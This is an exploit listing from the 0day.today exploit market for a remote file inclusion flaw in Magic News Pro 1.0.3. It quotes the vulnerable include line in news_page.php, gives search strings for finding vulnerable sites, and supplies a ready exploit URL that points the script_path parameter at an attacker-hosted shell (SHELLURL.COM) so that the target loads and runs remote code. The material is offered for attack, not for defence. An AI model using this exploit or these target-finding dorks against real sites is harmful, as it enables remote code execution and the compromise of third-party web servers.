[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Magic News Pro <= 1.0.3 (script_path) Remote File Include Vulnerability

Author
Saudi Hackrz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-829
Category
web applications
Date add
12-09-2006
Platform
unsorted
=======================================================================
Magic News Pro <= 1.0.3 (script_path) Remote File Include Vulnerability
=======================================================================


#====================================================================
#Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#=================================================================
#
#Script Name: Magic News Pro v 1.0.3
#Script :) << $$
#http://www.9q9q.net/up3/index.php?f=jMicDawzV
#
#=================================================================
#Bug in : news_page.php
#        include_once($script_path."/config.php");
#
#in <<<<  news/scripts/news_page.php
#Serche : "js-news.php?nr=" or "mgic news pro" or "js-news.php"
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/news/scripts/news_page.php?script_path=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : Saudi Hackrz
#
#GreetZ :SnIpEr_Sa , KiNg18 , LeCoPrA And All My Frind :)
===============================================================================#



#  0day.today [2024-12-25]  #